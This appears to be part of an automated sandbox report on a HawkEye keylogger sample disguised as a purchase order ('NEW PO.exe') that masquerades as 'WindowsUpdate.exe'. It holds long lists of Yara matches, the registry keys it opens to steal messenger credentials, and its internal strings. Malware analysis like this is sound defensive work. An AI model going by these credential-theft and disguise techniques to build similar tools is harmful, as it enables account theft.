Source: Yara match	File source: 10.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.WindowsUpdate.exe.408208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsUpdate.exe.409c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.3aa9930.46.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.WindowsUpdate.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.3ac2370.47.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsUpdate.exe.408208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.39.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.42f2370.46.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.27.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.NEW PO.exe.3ac2370.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.38.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.409c0d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.WindowsUpdate.exe.459fbd0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.NEW PO.exe.409c0d.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.409c0d.19.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.NEW PO.exe.408208.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.408208.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.28.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.22.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.409c0d.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsUpdate.exe.42f2370.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.3ac2370.34.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.42d9930.45.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.37.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.42f2370.34.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.27.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.408208.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.28.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.WindowsUpdate.exe.459fbd0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.409c0d.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.41.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.3ac2370.34.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsUpdate.exe.42f2370.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsUpdate.exe.409c0d.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.409c0d.24.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.3aa9930.35.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.22.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.23.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.WindowsUpdate.exe.402fbd0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.409c0d.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.400000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.NEW PO.exe.3aa9930.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.3ac2370.47.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.42f2370.46.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.NEW PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.409c0d.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.408208.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW PO.exe.474fbd0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.WindowsUpdate.exe.402fbd0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW PO.exe.43c56d8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.WindowsUpdate.exe.3e88750.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW PO.exe.45a8750.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.WindowsUpdate.exe.43f8750.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.WindowsUpdate.exe.3ca56d8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.WindowsUpdate.exe.42156d8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000000.399740135.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.293293515.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.313426139.0000000003AA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.401286482.00000000042D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.316195444.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.310799543.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.368028200.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.420264771.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.292647600.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.389083600.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.398239322.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.317013131.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.436080566.00000000042D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.370231808.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.369064581.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.367380540.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.318371710.0000000003AA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.315913694.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.292021486.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.350144733.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.399210452.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.316648058.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.360431975.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.392382903.00000000042D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.433632203.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.357544933.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.347313096.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.351819444.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.364013571.0000000003AA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.396224265.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: NEW PO.exe PID: 7156, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: NEW PO.exe PID: 6044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsUpdate.exe PID: 6976, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsUpdate.exe PID: 7120, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsUpdate.exe PID: 4816, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsUpdate.exe PID: 3996, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 6828, type: MEMORYSTR

Tries to steal Instant Messenger accounts or passwords

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt

Remote Access Functionality:

Yara detected HawkEye Keylogger

Show sources

Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.45fa72.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.40.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.45fa72.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.39.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.27.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.22.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.NEW PO.exe.409c0d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.408208.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW PO.exe.474fbd0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.45fa72.22.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.38.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.WindowsUpdate.exe.408208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.40.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsUpdate.exe.409c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.WindowsUpdate.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.29.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.WindowsUpdate.exe.45fa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsUpdate.exe.408208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.39.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.38.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.409c0d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.WindowsUpdate.exe.459fbd0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.NEW PO.exe.408208.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.408208.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.28.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.409c0d.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.NEW PO.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.45fa72.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.37.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.27.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.408208.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.28.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.WindowsUpdate.exe.459fbd0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.41.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsUpdate.exe.45fa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.22.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.WindowsUpdate.exe.402fbd0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.409c0d.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.400000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.29.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.NEW PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.409c0d.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.408208.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW PO.exe.474fbd0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.WindowsUpdate.exe.402fbd0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW PO.exe.43c56d8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.WindowsUpdate.exe.3e88750.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW PO.exe.45a8750.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.WindowsUpdate.exe.43f8750.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.WindowsUpdate.exe.3ca56d8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.WindowsUpdate.exe.42156d8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000000.391647562.000000000358E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.400119443.000000000359A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.293293515.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.318319979.0000000002DF6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.310799543.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.317923125.0000000002D5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.368028200.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.292647600.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.399998942.000000000358E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.389083600.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.392059792.00000000035EA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.317941479.0000000002D6A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.435142271.000000000330F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.370231808.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.369064581.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.367380540.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.313223758.0000000002D6A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.313404967.0000000002DFA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.315913694.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.292021486.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.313199266.0000000002D5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.350144733.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.360431975.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.391692528.000000000359A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.362315745.0000000002ADF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.400644306.00000000035EA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.433632203.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.357544933.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.347313096.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.351819444.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.396224265.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.435207427.0000000003338000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.362383688.0000000002B10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: NEW PO.exe PID: 7156, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: NEW PO.exe PID: 6044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WerFault.exe PID: 6724, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsUpdate.exe PID: 6976, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsUpdate.exe PID: 7120, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsUpdate.exe PID: 4816, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsUpdate.exe PID: 3996, type: MEMORYSTR

Detected HawkEye Rat

Show sources

Source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp	String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
Source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp	String found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger \| Execution Confirmed \|
Source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp	String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger \| Stealer Records \|
Source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp	String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
Source: NEW PO.exe, 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
Source: NEW PO.exe, 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger \| Execution Confirmed \|
Source: NEW PO.exe, 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger \| Stealer Records \|
Source: NEW PO.exe, 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
